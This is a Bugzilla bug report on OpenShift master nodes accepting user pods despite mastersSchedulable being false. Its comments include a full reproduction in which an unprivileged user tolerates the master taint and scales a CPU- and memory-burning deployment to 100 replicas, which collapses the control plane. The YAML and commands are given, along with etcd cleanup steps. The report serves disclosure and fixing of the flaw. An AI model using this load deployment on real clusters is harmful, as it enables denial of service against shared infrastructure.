Bug 1956497

Summary: Non-openshift pods are running on master nodes even though .spec.mastersSchedulable` field has value `false`.
Product: OpenShift Container Platform Reporter: arajapa
Component: kube-schedulerAssignee: Jan Chaloupka <jchaloup>
Status: CLOSED DEFERRED QA Contact: RamaKasturi <knarra>
Severity: medium Docs Contact:
Priority: medium    
Version: 4.5CC: akaris, aos-bugs, bhershbe, ealcaniz, gdiotte, jchaloup, mfojtik
Target Milestone: ---   
Target Release: ---   
Hardware: x86_64   
OS: Linux   
URL: https://gss--c.visualforce.com/apex/Case_View?id=5002K00000uELdKQAW
Whiteboard:
Fixed In Version: Doc Type: If docs needed, set a value
Doc Text:
Story Points: ---
Clone Of: Environment:
Last Closed: 2021-05-17 08:36:10 UTC Type: Bug
Regression: --- Mount Type: ---
Documentation: --- CRM:
Verified Versions: Category: ---
oVirt Team: --- RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: --- Target Upstream Version:
Embargoed:

Description arajapa 2021-05-03 19:27:38 UTC
Description of problem:
Each master has the `NoSchedule` taint, and in the object `schedulers.config.openshift.io/cluster` , the `.spec.mastersSchedulable` field has value `false`.  However, the customer has found that a number of non-openshift pods were unexpectedly found running on master nodes.


Version-Release number of selected component (if applicable):
4.5.16

How reproducible:


Steps to Reproduce:
1.
2.
3.

Actual results:


Expected results:


Additional info:

Comment 1 arajapa 2021-05-03 19:33:33 UTC
I was unable to link the bug to the case in SF, Case # is 02912203

Comment 2 Jan Chaloupka 2021-05-07 14:50:30 UTC
From https://docs.openshift.com/container-platform/4.5/nodes/nodes/nodes-nodes-working.html#nodes-nodes-working-master-schedulable_nodes-nodes-working:

```
You can configure master nodes to be schedulable, meaning that new pods are allowed for placement on the master nodes. By default, master nodes are not schedulable.
...
You can allow or disallow master nodes to be schedulable by configuring the mastersSchedulable field.
```

Some history:
In the past it was enough to set node.Spec.Unschedulable to decide if a node is schedulable or not. This functionality was deprecated in 1.13 [1] and replaced by setting node.kubernetes.io/unschedulable taint [2]. The kube-scheduler still reads node.Spec.Unschedulable to decide if a node is feasible for scheduling. Though, if pods tolerates the taint, node.Spec.Unschedulable has no effect.
When a pod tolerating the taint is created, the kubelet does not see anything wrong with it and just runs the pod even on the master nodes.

It is the machine-config-operator that consumes mastersSchedulable field and based on its value, it either taints every master node with the following taint:

Key: node-role.kubernetes.io/master
Effect: NoSchedule

or removes it. Then, either the pod tolerates the taint (and is scheduled to a master node) or it does not tolerate. Also, given the pod's nodename can be set explicitly, this issue is not about kube-scheduler but more about allowing a pod to tolerate any taint. Also, kubelet has no power if deciding a pod that tolerates the taint is supposed to run on its node. So this needs to be decided before a pod is created/updated. I.e. though admission plugins. The question is what's the criteria that will decide if a given pod is allowed to tolerate all taints (or specifically node-role.kubernetes.io/master:NoSchedule one).

[1] https://github.com/kubernetes/kubernetes/blob/master/pkg/scheduler/framework/plugins/nodeunschedulable/node_unschedulable.go#L69-L72
[2] https://kubernetes.io/docs/concepts/scheduling-eviction/taint-and-toleration/#taint-based-evictions

Comment 4 Jan Chaloupka 2021-05-10 07:16:27 UTC
Are the pods that got scheduled to master nodes (despite mastersSchedulable set to false) created by an admin? Or, were they created by a user? If the former is true, we can update our documentation and provide a warning. If it's the latter case, I suggest to open an RFE where we can discuss the next steps to resolve this issue.

Comment 5 Andreas Karis 2021-05-10 14:22:10 UTC
In upstream kubernetes, there is nothing that stops a non-admin user from creating any toleration for any taint - at least according to the doc.
https://kubernetes.io/docs/concepts/scheduling-eviction/taint-and-toleration/

It seems to be exactly the same in OpenShift.

Here's my test with 4.6.23:

Creating an unprivileged user and logging in with that user:
~~~
[root@openshift-jumpserver-0 ~]# export KUBECONFIG=/root/openshift-install/auth/kubeconfig
[root@openshift-jumpserver-0 ~]#  oc get clusterversion
NAME      VERSION   AVAILABLE   PROGRESSING   SINCE   STATUS
version   4.6.23    True        False         32d     Cluster version is 4.6.23
[root@openshift-jumpserver-0 ~]# htpasswd -c -B -b users.htpasswd user1 MyPassword!
Adding password for user user1
[root@openshift-jumpserver-0 ~]#  oc create secret generic htpass-secret --from-file=htpasswd=users.htpasswd -n openshift-config
secret/htpass-secret created

[root@openshift-jumpserver-0 ~]# cat <<'EOF' | oc apply -f - 
apiVersion: config.openshift.io/v1
kind: OAuth
metadata:
  name: cluster
spec:
  identityProviders:
  - name: my_htpasswd_provider 
    mappingMethod: claim 
    type: HTPasswd
    htpasswd:
      fileData:
        name: htpass-secret 
EOF

[root@openshift-jumpserver-0 ~]# oc login -u user1 --password=MyPassword!
Login successful.

You don't have any projects. You can try to create a new project, by running

    oc new-project <projectname>

[root@openshift-jumpserver-0 ~]# oc whoami
user1
~~~

~~~
oc new-project user1
cat <<'EOF' > pod.yaml
apiVersion: v1
kind: Pod
metadata:
  name: fedora-pod
  labels:
    app: fedora-pod
spec:
  containers:
  - name: fedora
    image: fedora
    command:
      - sleep
      - infinity
    imagePullPolicy: IfNotPresent
  tolerations:
  - key: "node-role.kubernetes.io/master"
    operator: "Exists"
    effect: "NoSchedule"
  affinity:
    nodeAffinity:
      requiredDuringSchedulingIgnoredDuringExecution:
        nodeSelectorTerms:
        - matchExpressions:
          - key: kubernetes.io/hostname
            operator: In
            values:
            - "openshift-master-0"
EOF
oc apply -f pod.yaml
~~~

~~~
[root@openshift-jumpserver-0 ~]# oc get pods -o wide
NAME         READY   STATUS    RESTARTS   AGE   IP            NODE                 NOMINATED NODE   READINESS GATES
fedora-pod   1/1     Running   0          21s   172.26.0.69   openshift-master-0   <none>           <none>
[root@openshift-jumpserver-0 ~]# 
~~~

~~~
[root@openshift-jumpserver-0 ~]# oc whoami
user1
~~~

Comment 6 Andreas Karis 2021-05-10 14:33:51 UTC
So this is upstream:
https://github.com/kubernetes/kubernetes/issues/48041
https://github.com/kubernetes/kubernetes/issues/61185

The last one auto-closed, I'm currently still checking if any progress was made beyond the discussions on the 2 issues.

Comment 7 Andreas Karis 2021-05-10 14:42:28 UTC
I created https://issues.redhat.com/browse/RFE-1856

Would that do it?

Do you have any idea for a workaround (I suppoed that we cannot control this via SCC?) or do you know if further progress has been made upstream beyond 
https://github.com/kubernetes/kubernetes/issues/48041
https://github.com/kubernetes/kubernetes/issues/61185

Shall we close this BZ in favor of the RFE?

Thanks,

Andreas

Comment 8 Andreas Karis 2021-05-11 10:04:12 UTC
I updated the RFE with this, but I'll post it here, nevertheless. This might become a high priority issue for our customer, rather quickly.

I am testing with virtualized masters, but I imagine that the issue can be reproduced similarly on baremetal machines by simply increasing the load further.  If my test is valid, then malicious, unprivileged users can easily generate so much load on any given cluster that the control plane collapses.

As an unprivileged user:
~~~
[root@openshift-jumpserver-0 ~]# oc whoami
user1
~~~

I create the following load-tester where each pod will allocate 1GB of memory and 1000ms of CPU time:
~~~
cat <<'EOF' > load.yaml 
apiVersion: apps/v1
kind: Deployment
metadata:
  name: load-tester
  labels:
    app: load-tester
spec:
  replicas: 1
  selector:
    matchLabels:
      app: load-tester
  template:
    metadata:
      labels:
        app: load-tester
    spec:
      containers:
      - name: load-tester
        image: quay.io/akaris/hpa-tester:latest
        command:
        - /bin/bash
        - -c
        - "churn 1000 & mallocmb 1024 & sleep infinity"
      tolerations:
      - key: "node-role.kubernetes.io/master"
        operator: "Exists"
        effect: "NoSchedule"
      affinity:
        nodeAffinity:
          requiredDuringSchedulingIgnoredDuringExecution:
            nodeSelectorTerms:
            - matchExpressions:
              - key: node-role.kubernetes.io/master
                operator: In
                values:
                - ""
EOF
oc apply -f load.yaml
~~~

~~~
[root@openshift-jumpserver-0 ~]# oc get pods -o wide
NAME                           READY   STATUS    RESTARTS   AGE   IP             NODE                 NOMINATED NODE   READINESS GATES
fedora-pod                     1/1     Running   0          18h   172.26.0.69    openshift-master-0   <none>           <none>
load-tester-7f85bc7d49-crgmn   1/1     Running   0          11s   172.24.0.120   openshift-master-1   <none>           <none>
~~~

~~~
[root@openshift-jumpserver-0 ~]# oc scale --replicas=100 deployment load-tester
deployment.apps/load-tester scaled
~~~

That will spawn 100 pods of the same (each one using a full CPU and trying to alloc 1 GB ... so 33 of these pods per master)

And this will create gigantic loads on the masters:
~~~
top - 08:43:07 up 33 days, 14:21,  1 user,  load average: 350.09, 153.61, 59.21
Tasks: 639 total,  38 running, 598 sleeping,   0 stopped,   3 zombie
%Cpu(s): 51.4 us, 41.8 sy,  0.0 ni,  0.0 id,  2.3 wa,  2.6 hi,  1.9 si,  0.0 st
MiB Mem :  16034.0 total,    149.1 free,  14971.0 used,    913.8 buff/cache
MiB Swap:      0.0 total,      0.0 free,      0.0 used.    634.4 avail Mem 

    PID USER      PR  NI    VIRT    RES    SHR S  %CPU  %MEM     TIME+ COMMAND                                       
3208490 root      20   0 1931228 965940  15976 S 106.5   5.9 112:59.46 kube-apiserver                                
   5994 root      20   0 9066628 446848      0 S  83.9   2.7   2993:04 etcd                                          
   2647 root      20   0 6455880 207508      0 S  22.6   1.3   5569:50 kubelet                                       
[root@openshift-master-1 ~]# 
~~~

And the control plane will become unusable:
~~~
[root@openshift-jumpserver-0 ~]# time oc whoami
Error from server (InternalError): an error on the server ("") has prevented the request from succeeding (get users.user.openshift.io ~)

real	0m13.243s
user	0m0.171s
sys	0m0.041s
[root@openshift-jumpserver-0 ~]# time oc get pods
Unable to connect to the server: net/http: TLS handshake timeout

real	0m12.181s
user	0m0.198s
sys	0m0.030s
~~~

The master nodes are super unresponsive due to the increased load and the OOM situation, and eventually the kubernetes control plane will not even answer:
~~~
[root@openshift-jumpserver-0 ~]# oc get pods
The connection to the server api.ipi-cluster.example.com:6443 was refused - did you specify the right host or port?
[root@openshift-jumpserver-0 ~]# 
~~~

In order to recover, I had to go to my master nodes and run:
~~~
sudo -i
systemctl stop kubelet ; crictl ps | grep load-tester | awk '{print $1}' | while read l ; do crictl stop $l ; done
~~~

The problem is that my SSH sessions were super unstable, too. I think at some point, the OOM killer killer my session. 
On another node, it literally took minutes to log in and I had to reboot it. Stopping the containers also took a long time.

After I stopped kubelet and removed all load-tester pods, I had to manually delete the deployment and all associated pods from etcd.

On one of the masters, I ran:
~~~
crictl ps | grep etcdctl
crictl exec 28117d1ac36c4 etcdctl del /kubernetes.io/deployments/user1/load-tester
crictl exec 28117d1ac36c4 etcdctl get --keys-only --prefix /kubernetes.io/pods/user1/load | while read l ; do if [ "$l" != "" ]; then crictl exec 28117d1ac36c4 etcdctl del $l ; fi;  done
~~~

After the cleanup, I made sure that all keys for the load-tester deployment were gone:
~~~
[root@openshift-master-0 ~]# crictl exec 28117d1ac36c4 etcdctl get --keys-only --prefix /kubernetes.io/pods/user1/
/kubernetes.io/pods/user1/fedora-pod
[root@openshift-master-0 ~]# crictl exec 28117d1ac36c4 etcdctl get --keys-only --prefix /kubernetes.io/deployments/user1/
[root@openshift-master-0 ~]# crictl exec 28117d1ac36c4 etcdctl get --keys-only --prefix /kubernetes.io/replicasets/user1/
[root@openshift-master-0 ~]# 
~~~


And then, I could restart kubelet on all masters and the cluster finally recovered:
~~~
systemctl restart kubelet
~~~

- Andreas

Comment 9 Jan Chaloupka 2021-05-11 10:11:05 UTC
Thanks Andreas for filling the RFE. Given the potential severity of the issue, let's keep the BZ open for now.